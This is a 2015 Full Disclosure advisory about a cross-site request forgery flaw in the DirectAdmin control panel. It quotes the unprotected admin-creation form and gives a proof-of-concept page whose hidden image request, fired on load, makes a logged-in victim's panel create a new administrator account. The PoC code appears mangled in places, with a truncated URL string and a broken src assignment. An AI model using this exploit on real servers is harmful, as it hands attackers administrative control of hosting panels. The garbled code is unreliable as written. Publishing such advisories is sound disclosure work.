# Title : DirectAdmin (1.44.3) CSRF Vulnerability
# Date : 10-10-2015
# Version : 1.43.3-1.44.3
# Author : @babayarisi http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.
#As you can see original form doesn't include csrf protection or any secret token.
<form name=reseller action="" method="post" _onSubmit_="return formOK()">
<input type=hidden name=action value=create>
<tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 _onChange_="checkName()"></td></tr>
<tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email _onChange_="checkEmail()"></td></tr>
<tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" _onClick_="randomPass()"></td></tr>
<tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 _onChange_="checkPass()"></td></tr>
<tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="">Edit Admin Message</a></td></tr>
<tr><td td class="listtitle" colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>
#POC
<html>
<head>
<title>POC</title>
</head>
<script language="_javascript_">
function yurudi(){
var adress ="www.demo.com";
var username="demo";
var email ="[email protected]";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action="">
document.getElementById("resim").src="" />}
</script>
<body _onload_="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC
# don't be evil!
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
